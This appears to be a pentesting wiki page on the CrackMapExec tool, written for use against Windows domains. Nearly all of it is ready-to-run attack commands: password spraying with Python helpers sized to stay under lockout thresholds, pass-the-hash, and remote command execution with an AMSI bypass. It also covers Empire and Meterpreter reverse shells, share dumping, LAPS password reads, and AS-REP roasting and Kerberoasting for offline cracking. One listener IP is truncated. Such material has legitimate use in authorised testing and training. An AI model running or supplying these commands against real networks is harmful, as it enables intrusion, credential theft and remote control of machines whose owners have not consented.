# CrackMapExec

{% embed url="<https://github.com/Porchetta-Industries/CrackMapExec>" %}

## Installation

Run the mass tools script and it will install it. Upstream documentation: <https://mpgn.gitbook.io/crackmapexec/>

## Using Credentials

Every protocol supports using credentials in one form or another. The protocol (`smb`, `ldap`, `winrm`, `mssql`, `ssh`, `rdp`) always comes before the target(s):

```bash
crackmapexec <protocol> <target(s)> -u username -p password
crackmapexec <protocol> <target(s)> -u username -p 'Admin!123@'
```

Quote passwords that contain shell metacharacters (`!`, `$`, `@`) in single quotes, as in the second line.

From the database (credential IDs as listed by `cmedb`):

```bash
crackmapexec <protocol> <target(s)> -id <cred ID(s)>
```

Multi-domain environment: put the domain with each user in a file and pass that file to `-u`, so one run covers several domains:

```bash
crackmapexec <protocol> <target(s)> -u FILE -p password
```

Where FILE contains one `DOMAIN\user` per line:

```text
DOMAIN1\user
DOMAIN2\user
```

Brute force / password spraying. By default every user is tried against every password (`-u`, `-p` and `-H` accept one or more values, or a file with one entry per line):

```bash
crackmapexec <protocol> <target(s)> -u username1 -p password1 password2
crackmapexec <protocol> <target(s)> -u username1 username2 -p password1
crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords
crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes
```

Password spraying without brute force: `--no-bruteforce` pairs line N of the user file with line N of the password (or hash) file instead of trying every combination, so the two files must line up. Add `--continue-on-success` to keep going after the first valid login instead of stopping at it:

```bash
crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes --no-bruteforce
crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords --no-bruteforce
```

Check the lockout policy (`--pass-pol`, see Enumeration below) before spraying: a full brute force sends every password to every account.
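What the two spray modes actually send, and how to size a spray against the lockout threshold reported by `--pass-pol`, as an added Python example. This is not CrackMapExec code: the user and password lists are constructed, and `spray_pairs`, `attempts_per_user` and `plan_spray` are this example's own names.

```python
"""Added example, not CrackMapExec code: what the default spray and
--no-bruteforce actually attempt, and how to size a spray against the
lockout threshold from --pass-pol. Sample users/passwords are constructed;
the function names are this example's own."""
from itertools import product

# Constructed stand-ins for the user file and the password file
USERS = ["alice", "bob", "carol"]
PASSWORDS = ["Winter2024!", "Spring2024!", "Summer2024!"]


def spray_pairs(users, passwords, no_bruteforce=False):
    """Return the (user, password) attempts CME makes.

    Default: every user against every password (cartesian product).
    --no-bruteforce: line N of the user file with line N of the password
    file only, which is why the two files must line up."""
    if no_bruteforce:
        return list(zip(users, passwords))
    return list(product(users, passwords))


def attempts_per_user(users, passwords, no_bruteforce=False):
    """Largest number of guesses any single account receives; compare this
    against the lockout threshold before running the spray."""
    counts = {}
    for user, _ in spray_pairs(users, passwords, no_bruteforce):
        counts[user] = counts.get(user, 0) + 1
    return max(counts.values(), default=0)


def plan_spray(passwords, lockout_threshold, safety_margin=1):
    """Split the password list into rounds that stay below the lockout
    threshold. Windows reports threshold 0 as 'no lockout', so everything
    fits in one round; otherwise each round tries at most
    (threshold - safety_margin) passwords per account, and the caller waits
    out the lockout observation window between rounds."""
    if lockout_threshold <= 0:
        return [list(passwords)]
    per_round = lockout_threshold - safety_margin
    if per_round < 1:
        raise ValueError("lockout threshold too low to spray safely")
    return [list(passwords[i:i + per_round])
            for i in range(0, len(passwords), per_round)]


if __name__ == "__main__":
    print("default      :", spray_pairs(USERS, PASSWORDS))
    print("no-bruteforce:", spray_pairs(USERS, PASSWORDS, no_bruteforce=True))
    # Policy from `cme smb <dc> --pass-pol` with a lockout threshold of 3
    print("rounds       :", plan_spray(PASSWORDS, lockout_threshold=3))
```

Run the default mode only after `plan_spray` says the whole list fits in one round, or feed it one round at a time and wait out the observation window in between.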

## Using Kerberos

CME supports Kerberos authentication: point the `KRB5CCNAME` environment variable at the ccache file holding the ticket (for example one produced by impacket's `getTGT.py`) and pass `--kerberos`. The target must be the same hostname (FQDN) as the one in the Kerberos ticket, not an IP address, otherwise the service ticket does not match the target and authentication fails:

```bash
export KRB5CCNAME=/home/bonclay/impacket/bonclay.ccache
sudo cme smb zoro.gold.local --kerberos -x whoami

export KRB5CCNAME=/home/bonclay/impacket/administrator.ccache
cme smb zoro.gold.local --kerberos
sudo cme smb zoro.gold.local --kerberos -x whoami
```

![](https://1869523342-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fhm1D8gi3B6d9E2ORIBkC%2Fuploads%2Ft7PxDzDE29U4uxUOX0TI%2Fimage.png?alt=media\&token=3b1e60ee-590d-4b4d-84a2-e883414b2910)

## Using Modules

![](https://1869523342-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fhm1D8gi3B6d9E2ORIBkC%2Fuploads%2FNCFvgsQM1aHBGYTDZI3Y%2Fimage.png?alt=media\&token=ddef99d2-077f-4e98-9250-459084903306)

## Using Database

![](https://1869523342-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fhm1D8gi3B6d9E2ORIBkC%2Fuploads%2FK0nEOGtBNpirhJmRIn64%2Fimage.png?alt=media\&token=28ccce00-e5f2-4b6e-be29-7408a7e5893c)

## SMB - Scanning for Vulns

When you start an internal pentest, these are the first modules to try. Point them at the domain controller; the first two need no credentials, noPAC needs a valid domain account:

Zerologon (the module only checks whether the DC is vulnerable; it does not reset the machine account password):

```bash
crackmapexec smb <dc-ip> -u '' -p '' -M zerologon
```

PetitPotam:

```bash
crackmapexec smb <dc-ip> -u '' -p '' -M petitpotam
```

noPAC:

```bash
crackmapexec smb <dc-ip> -u 'user' -p 'pass' -M nopac
```

## Enumeration

Returns a list of live hosts together with their SMB banner (OS, domain, whether signing is required):

```bash
cme smb 192.168.1.0/24
```

Checks for null sessions (empty user and empty password):

```bash
cme smb 10.10.10.161 -u '' -p ''
cme smb 10.10.10.161 -u '' -p '' --pass-pol
cme smb 10.10.10.161 -u '' -p '' --users
cme smb 10.10.10.161 -u '' -p '' --groups
```

You can also use the Samba tools (`-N` means no password, `-L` lists shares):

```bash
smbclient -N -U "" -L //10.10.10.161
rpcclient -N -U "" 10.10.10.161
rpcclient $> enumdomusers
```

Pulling the password policy:

```bash
cme smb 10.10.10.161 -u '' -p '' --pass-pol
```

Anonymous logon (make sure the password is empty; a made-up user with an empty password is treated as an anonymous/guest logon where the host allows it):

```bash
cme smb 10.10.10.178 -u 'a' -p ''
```

You can also use...

```bash
smbclient -N -L //10.10.10.178
rpcclient -N -U "" 10.10.10.178
```

Enumerate active sessions on the remote target:

```bash
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sessions
```

Enumerate permissions on all shares:

```bash
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --shares
```

Enumerate disks on the remote target:

```bash
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --disks
```

Enumerate logged-on users:

```bash
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --loggedon-users
```

Enumerate domain users:

```bash
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --users
```

Enumerate users by brute-forcing RIDs on the remote target (often works where `--users` does not, for example over a null session):

```bash
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --rid-brute
```

Enumerate domain groups:

```bash
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --groups
```

Enumerate local groups on the remote target:

```bash
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-groups
```

Enumerate hosts with SMB signing not required: maps the live hosts and writes out only those that do not require SMB signing, i.e. the targets an NTLM relay (ntlmrelayx) can authenticate to:

```bash
cme smb 192.168.1.0/24 --gen-relay-list relaylistOutputFilename.txt
cat relaylistOutputFilename.txt
```

Checking domain credentials against a subnet:

```bash
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE'
```

A `[+]` in the output means the login worked; `(Pwn3d!)` after it means the account is a local administrator on that host.

After dumping a hash in pwdump/secretsdump format such as `Administrator:500:aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c:::` (user:RID:LM:NT:::), you can pass `-H` either the full `LM:NT` pair or just the NT hash (the second half). `aad3b435b51404eeaad3b435b51404ee` is the LM hash of an empty password, which is what hosts store when LM hashes are disabled (the default since Vista), so the NT half alone is all that matters:

```bash
cme smb 192.168.1.0/24 -u UserNAme -H 'LM:NT'
cme smb 192.168.1.0/24 -u UserNAme -H 'NTHASH'
cme smb 192.168.1.0/24 -u Administrator -H '13b29964cc2480b4ef454c59562e675c'
cme smb 192.168.1.0/24 -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c'
```
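How the NT hash relates to the password and how a dump line turns into the `-H` argument, as an added Python example (not CrackMapExec code). It implements MD4 in pure Python because OpenSSL 3 builds of `hashlib` often lack `md4`; the sample dump line is constructed, and `md4`, `nt_hash`, `parse_dump_line` and `cme_hash_arg` are this example's own names.

```python
"""Added example, not CrackMapExec code: compute an NT hash the way Windows
does (MD4 over the UTF-16LE password), parse a secretsdump/pwdump line and
build the value CME expects after -H. Pure-Python MD4 is used because
OpenSSL 3 builds of hashlib often lack md4. Function names are this
example's own."""
import struct

_MASK = 0xFFFFFFFF
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of an empty password


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & _MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 (three rounds of 16 steps over 64-byte blocks)."""
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), range(16), (3, 7, 11, 19), 0),
        (lambda x, y, z: (x & y) | (x & z) | (y & z),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15),
         (3, 5, 9, 13), 0x5A827999),
        (lambda x, y, z: x ^ y ^ z,
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15),
         (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for f, order, shifts, k in rounds:
            for i, idx in enumerate(order):
                # each step updates one register, then the registers rotate
                a = _rotl((a + f(b, c, d) + x[idx] + k) & _MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c
        a0, b0, c0, d0 = ((a0 + a) & _MASK, (b0 + b) & _MASK,
                          (c0 + c) & _MASK, (d0 + d) & _MASK)
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), hex, as stored in the SAM/NTDS."""
    return md4(password.encode("utf-16-le")).hex()


def parse_dump_line(line: str) -> dict:
    """Parse 'user:rid:lmhash:nthash:::' (secretsdump / pwdump format)."""
    user, rid, lm, nt = line.strip().split(":")[:4]
    return {"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()}


def cme_hash_arg(entry: dict, full: bool = False) -> str:
    """Value to pass after -H: 'LM:NT' or just the NT half. NTLM
    authentication only needs the NT hash; the LM half is usually EMPTY_LM."""
    return f"{entry['lm']}:{entry['nt']}" if full else entry["nt"]


if __name__ == "__main__":
    # Constructed sample line in the same shape as the Administrator entry above
    sample = ("Administrator:500:aad3b435b51404eeaad3b435b51404ee:"
              "8846f7eaee8fb117ad06bdd830b7586c:::")
    entry = parse_dump_line(sample)
    print("-H", cme_hash_arg(entry), "| LM empty:", entry["lm"] == EMPTY_LM)
    print("NT('password') matches:", nt_hash("password") == entry["nt"])
```

A quick sanity check on any hash you are about to spray with `-H`: it must be 32 hex characters (the NT half) or 65 with the colon, and the LM half being `EMPTY_LM` is expected, not a sign of a broken dump.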

Checking local credentials (`--local-auth` authenticates against the host's local SAM instead of the domain):

```bash
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-auth
cme smb 192.168.1.0/24 -u '' -p '' --local-auth
cme smb 192.168.1.0/24 -u UserNAme -H 'LM:NT' --local-auth
cme smb 192.168.1.0/24 -u UserNAme -H 'NTHASH' --local-auth
cme smb 192.168.1.0/24 -u localguy -H '13b29964cc2480b4ef454c59562e675c' --local-auth
cme smb 192.168.1.0/24 -u localguy -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c' --local-auth
```
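Triage of a subnet-wide credential check, as an added Python example (not CrackMapExec code): it parses CME's console lines, which have the form `PROTO ip port hostname [marker] message` where `[+]` is a valid login, `[-]` a failure, `[*]` an info line such as the SMB banner, and `(Pwn3d!)` marks local-admin access. The output lines are constructed, and `parse_cme_output`, `triage` and `relay_candidates` are this example's own names.

```python
"""Added example, not CrackMapExec code: sort CME console output into
valid logins, local-admin hosts and relay targets (signing not required).
The sample output is constructed; function names are this example's own."""
import re

# PROTO  ip  port  hostname  [marker] message
LINE_RE = re.compile(
    r"^(?P<proto>\S+)\s+(?P<ip>\S+)\s+(?P<port>\d+)\s+(?P<host>\S+)\s+"
    r"(?P<marker>\[[+\-*!]\])\s+(?P<msg>.*)$"
)

# Constructed sample of `cme smb 192.168.1.0/24 -u alice -p 'Winter2024!'`
SAMPLE_OUTPUT = """\
SMB         192.168.1.10    445    DC01             [*] Windows Server 2019 Standard 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         192.168.1.10    445    DC01             [+] corp.local\\alice:Winter2024!
SMB         192.168.1.21    445    FILES01          [*] Windows 10.0 Build 19041 x64 (name:FILES01) (domain:corp.local) (signing:False) (SMBv1:False)
SMB         192.168.1.21    445    FILES01          [+] corp.local\\alice:Winter2024! (Pwn3d!)
SMB         192.168.1.33    445    WKS07            [*] Windows 10.0 Build 19041 x64 (name:WKS07) (domain:corp.local) (signing:False) (SMBv1:False)
SMB         192.168.1.33    445    WKS07            [-] corp.local\\alice:Winter2024! STATUS_LOGON_FAILURE
"""


def parse_cme_output(text):
    """Yield one dict per parseable line; anything else (banners, blank
    lines, module chatter) is skipped rather than crashing the parser."""
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if m:
            yield m.groupdict()


def triage(text):
    """Bucket hosts by what the run told us about them."""
    result = {"valid": [], "admin": [], "no_signing": [], "failed": []}
    for ev in parse_cme_output(text):
        ip, marker, msg = ev["ip"], ev["marker"], ev["msg"]
        if marker == "[+]":
            result["valid"].append(ip)
            if "(Pwn3d!)" in msg:
                result["admin"].append(ip)
        elif marker == "[-]":
            result["failed"].append(ip)
        elif marker == "[*]" and "(signing:False)" in msg:
            result["no_signing"].append(ip)
    return result


def relay_candidates(text, exclude_admin=True):
    """Hosts worth relaying to: signing off and, by default, not already
    owned, since relaying to a host you can already execute on gains nothing."""
    t = triage(text)
    owned = set(t["admin"]) if exclude_admin else set()
    return [ip for ip in t["no_signing"] if ip not in owned]


if __name__ == "__main__":
    print(triage(SAMPLE_OUTPUT))
    print("relay targets:", relay_candidates(SAMPLE_OUTPUT))
```

The `no_signing` bucket is the same information `--gen-relay-list` writes out; computing it from a run you already did saves a second pass over the subnet.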

## Command Execution

CME has three different command execution methods:

1. wmiexec executes commands via WMI
2. atexec executes commands by scheduling a task with the Windows task scheduler
3. smbexec executes commands by creating and running a service

By default CME fails over to a different execution method if one fails. It attempts to execute commands in the following order:

1. wmiexec
2. atexec
3. smbexec

If you want to force CME to use only one execution method, specify it with `--exec-method` (for example `--exec-method smbexec`). In the following example, we execute `whoami` on the target using the `-x` flag:

```bash
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami
```

You can also directly execute PowerShell commands using the `-X` flag:

```bash
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable'
```

Bypass AMSI: `--amsi-bypass` takes a file with your AMSI bypass payload, which CME runs ahead of the PowerShell command given with `-X`:

```bash
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' --amsi-bypass /path/payload
```

For example, without the bypass the command is blocked by AV:

```bash
poetry run crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' --smb-server-port 1337
```

With the bypass file the command executes:

```bash
poetry run crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' --smb-server-port 1337 --amsi-bypass /tmp/amsi
```

## Getting Shells

We can use the `empire_exec` module to execute an Empire agent's initial stager. In the background, the module connects to Empire's RESTful API, generates a launcher for the specified listener and executes it.

First set up the REST API:

![](https://1869523342-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fhm1D8gi3B6d9E2ORIBkC%2Fuploads%2FHtBYO4PGLLcHChfxfDGd%2Fimage.png?alt=media\&token=5132a375-a2ef-4333-83b9-603ddc831e65)

Then just run the `empire_exec` module and specify the listener name:

```bash
crackmapexec smb 192.168.10.0/24 -u username -p password -M empire_exec -o LISTENER=test
```

Meterpreter: we can use the `met_inject` module to launch a Meterpreter session via the `Invoke-MetasploitPayload.ps1` script. On your Metasploit instance, run the following commands:

```text
> use exploit/multi/script/web_delivery
```

The SRVHOST and SRVPORT variables are used for running the web server that hosts the script:

```text
> set SRVHOST 10.211.55
> set SRVPORT 8443
```

The target variable determines what type of script we're using; 2 is PowerShell:

```text
> set target 2
```

Pick your payload. In this case, we'll use a reverse HTTPS Meterpreter payload:

```text
> set payload windows/meterpreter/reverse_https
> set LHOST 10.211.55
> set LPORT 443
> run
```

Once run, the `web_delivery` module will spin up the web server to host the script and the reverse listener for our Meterpreter session. Then just run the `met_inject` module and point SRVHOST/SRVPORT at that web server (RAND is the random URI path that `web_delivery` printed, SSL selects http or https):

```bash
crackmapexec smb 192.168.10.0/24 -u username -p password -M met_inject -o SRVHOST=192.168.10.3 SRVPORT=8443 RAND=eYEssEwv2D SSL=http
```

## Spidering Shares

The module `spider_plus` allows you to list and dump all files from all readable shares.

List all readable files:

```bash
crackmapexec smb 10.10.10.10 -u 'user' -p 'pass' -M spider_plus
```

Dump all files (with `-o READ_ONLY=false` every readable file is copied to the attacking host, so mind the volume on large file servers):

```bash
crackmapexec smb 10.10.10.10 -u 'user' -p 'pass' -M spider_plus -o READ_ONLY=false
```

## Sending files to Remote Targets

Upload a file (the remote path is relative to the `C$` share; the backslashes are doubled so the shell passes them through unchanged):

```bash
cme smb 172.16.251.152 -u user -p pass --put-file /tmp/whoami.txt \\Windows\\Temp\\whoami.txt
```

Grab a file from the remote target:

```bash
cme smb 172.16.251.152 -u user -p pass --get-file \\Windows\\Temp\\whoami.txt /tmp/whoami.txt
```

## Dumping Creds

![](https://1869523342-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fhm1D8gi3B6d9E2ORIBkC%2Fuploads%2FZka7kZeKUDa1BFCQAEEd%2Fimage.png?alt=media\&token=8ce6bc5c-92a3-4937-afe9-03c0f1cbad4c)

## CME when LAPS is installed on the Domain

If LAPS is used in the domain, the local administrator password differs per machine, so a single credential cannot run a command on every computer. The `--laps` core option handles this: if you have compromised an account that can read LAPS passwords, CME reads each target's password from the `ms-Mcs-AdmPwd` attribute and authenticates with it:

```bash
crackmapexec smb <targets> -u user-can-read-laps -p pass --laps
crackmapexec smb <targets> -u user-can-read-laps -p pass --laps --sam
```

## Checking if the Service Spooler is running

Hosts with the Print Spooler reachable over RPC are candidates for PrinterBug authentication coercion:

```bash
crackmapexec smb <targets> -u 'user' -p 'pass' -M spooler
```

Checking if the WebDAV client service (WebClient) is running; it is what makes a coerced authentication arrive over HTTP, which can be relayed to LDAP:

```bash
crackmapexec smb <targets> -u 'user' -p 'pass' -M webdav
```

## LDAP Authentication

Testing creds (domain name resolution is required; the LDAP bind uses the FQDN):

```bash
cme ldap 192.168.1.0/24 -u user -p password
cme ldap 192.168.1.0/24 -u user -H A29F7623FD11550DEF0192DE9246F46B
```

AS-REP roasting: you can retrieve the Kerberos 5 AS-REP etype 23 hash of users that do not require Kerberos pre-authentication, provided you have a list of users on the domain. The attack looks for accounts with pre-authentication disabled: anyone can send an AS-REQ to the KDC on behalf of such a user and receive an AS-REP, which contains a chunk of data encrypted with a key derived from the user's password, so the password can be cracked offline (more detail in Kerberos theory). Without credentials, the user list is what you supply:

```bash
cme ldap 192.168.0.104 -u harry -p '' --asreproast output.txt
```

Using a username wordlist:

```bash
cme ldap 192.168.0.104 -u user.txt -p '' --asreproast output.txt
```

With authentication: if you have one valid credential on the domain, you can retrieve all users and hashes where Kerberos pre-authentication is not required:

```bash
cme ldap 192.168.0.104 -u harry -p pass --asreproast output.txt
```

Use the `--kdcHost` option when domain name resolution fails:

```bash
cme ldap 192.168.0.104 -u harry -p pass --asreproast output.txt --kdcHost domain_name
```

To crack the hashes in output.txt with hashcat:

```bash
hashcat -m 18200 output.txt wordlist
```

Kerberoasting: you can retrieve Kerberos 5 TGS-REP etype 23 hashes with the Kerberoasting technique. The goal is to harvest TGS tickets for services that run under user accounts in AD, not computer accounts; part of each ticket is encrypted with a key derived from that user's password, so the credentials can be cracked offline (more detail in Kerberos theory). To perform this attack, you need an account on the domain:

```bash
cme ldap 192.168.0.104 -u harry -p pass --kerberoasting output.txt
hashcat -m 13100 output.txt wordlist.txt
```
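Routing the hashes from `--asreproast` and `--kerberoasting` to the right hashcat mode, as an added Python example covering both commands above (not CrackMapExec code). One output file can mix encryption types, and etype 17/18 hashes need different modes from the etype 23 ones shown above; the `$krb5asrep$`/`$krb5tgs$` prefixes and mode numbers are real, the sample hashes are constructed and truncated (not crackable), and `classify`, `route` and `hashcat_commands` are this example's own names.

```python
"""Added example, not CrackMapExec code: sort the hashes CME writes with
--asreproast / --kerberoasting into per-mode files for hashcat, because one
output file can mix encryption types and each needs a different mode.
Sample hashes are constructed and truncated; function names are this
example's own."""
import re

# hashcat modes by Kerberos hash type and etype (as of hashcat 6.2.6)
HASHCAT_MODES = {
    ("asrep", 23): 18200,   # Kerberos 5, etype 23, AS-REP
    ("asrep", 17): 32100,   # Kerberos 5, etype 17, Pre-Auth
    ("asrep", 18): 32200,   # Kerberos 5, etype 18, Pre-Auth
    ("tgs", 23): 13100,     # Kerberos 5, etype 23, TGS-REP
    ("tgs", 17): 19600,     # Kerberos 5, etype 17, TGS-REP
    ("tgs", 18): 19700,     # Kerberos 5, etype 18, TGS-REP
}

PREFIX_RE = re.compile(r"^\$krb5(?P<kind>asrep|tgs)\$(?P<etype>\d+)\$")

# Constructed sample of what output.txt may hold after both LDAP commands
SAMPLE_OUTPUT = """\
$krb5asrep$23$svc_backup@CORP.LOCAL:3e4f...:a1b2...
$krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQLSvc/sql01.corp.local:1433*$c0ffee...$deadbeef...
$krb5tgs$18$*svc_web$CORP.LOCAL$HTTP/web01.corp.local*$0badf00d...
not a hash line
"""


def classify(line):
    """Return (kind, etype) for a hash line, or None if it is not one."""
    m = PREFIX_RE.match(line.strip())
    if not m:
        return None
    return m.group("kind"), int(m.group("etype"))


def route(text):
    """Group hash lines by hashcat mode: {mode: [hash, ...]}. Types with no
    known mode are collected under None so they are not silently dropped."""
    buckets = {}
    for line in text.splitlines():
        key = classify(line)
        if key is None:
            continue
        mode = HASHCAT_MODES.get(key)
        buckets.setdefault(mode, []).append(line.strip())
    return buckets


def hashcat_commands(buckets, wordlist="wordlist.txt"):
    """One hashcat invocation per mode, each reading its own per-mode file."""
    return [f"hashcat -m {mode} krb_{mode}.txt {wordlist}"
            for mode in sorted(m for m in buckets if m is not None)]


if __name__ == "__main__":
    buckets = route(SAMPLE_OUTPUT)
    for mode, hashes in buckets.items():
        if mode is not None:
            with open(f"krb_{mode}.txt", "w") as fh:
                fh.write("\n".join(hashes) + "\n")
    print("\n".join(hashcat_commands(buckets)))
```

If `route` returns a `None` bucket, look at the prefix by hand: it is an etype this table does not know rather than a hash you can ignore.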

Unconstrained delegation: CrackMapExec can retrieve the list of all computers and users with the TRUSTED_FOR_DELEGATION flag set:

```bash
cme ldap 192.168.0.104 -u harry -p pass --trusted-for-delegation
```

Admin count: `adminCount=1` indicates that the object has had its ACL reset to a more secure value by the system (AdminSDHolder) because it was, directly or transitively, a member of one of the administrative groups. These are high-value accounts:

```bash
cme ldap 192.168.255.131 -u adm -p pass --admin-count
```

ADCS enumeration (ESC8 reconnaissance): the `adcs` module lists all PKI enrollment servers, i.e. the enrollment endpoints an NTLM relay could target:

```bash
crackmapexec ldap <dc-ip> -u user -p pass -M adcs
```

List all certificate templates of a given enrollment server:

```bash
crackmapexec ldap <dc-ip> -u user -p pass -M adcs -o SERVER=xxxx
```

## WINRM Protocol

Password spraying (without brute force):

```bash
cme winrm 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce
```

Testing creds:

```bash
cme winrm 192.168.1.0/24 -u user -p password
```

If the SMB port is closed, pass the domain with `-d DOMAIN` so CME does not need an SMB connection to discover it:

```bash
cme winrm 192.168.1.0/24 -u user -p password -d DOMAIN
```

Command execution (`-x` for a cmd command, `-X` for PowerShell):

```bash
cme winrm 192.168.255.131 -u user -p 'password' -X whoami
```

When LAPS is installed on the domain, `--laps` works for WinRM the same way as for SMB: with an account that can read LAPS passwords, CME fetches each target's local administrator password and authenticates with it:

```bash
crackmapexec winrm <targets> -u user-can-read-laps -p pass --laps
```

## MSSQL

Password spraying without brute force:

```bash
cme mssql 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce
```

Windows authentication with the SMB port open (CME takes the domain from the SMB banner):

```bash
cme mssql 10.10.10.52 -u james -p 'J@m3s_P@ssW0rd!'
```

With the SMB port closed, add the domain flag:

```bash
cme mssql 10.10.10.52 -u james -p 'J@m3s_P@ssW0rd!' -d HTB
```

For SQL logins (SQL Server authentication rather than Windows authentication) use `--local-auth`:

```bash
cme mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' --local-auth
```

Specify a non-default port:

```bash
cme mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' --port 1434
```

MSSQL privilege escalation (the `mssql_priv` module enumerates escalation paths such as impersonation rights):

```bash
cme mssql <targets> -u user -p password -M mssql_priv
```

Execute SQL queries:

```bash
cme mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' --local-auth -q 'SELECT name FROM master.dbo.sysdatabases;'
```

Windows commands (run through `xp_cmdshell`, so the login needs the rights to enable it):

```bash
cme mssql 10.10.10.59 -u sa -p 'GWE3V65#6KFH93@4GWTG2G' --local-auth -x whoami
```

## SSH

Password spraying:

```bash
cme ssh 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce
```

Testing creds (use `--port` for SSH on a non-standard port):

```bash
cme ssh 192.168.1.0/24 -u user -p password
cme ssh 192.168.1.0/24 -u user -p password --port 2222
```

Command execution:

```bash
cme ssh 127.0.0.1 -u user -p password -x whoami
```

## RDP

Password spraying (the RDP protocol validates credentials and can take screenshots with `--screenshot`; it has no command execution):

```bash
poetry run crackmapexec rdp 192.168.1.0/24 -u user -p password
poetry run crackmapexec rdp 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce
```

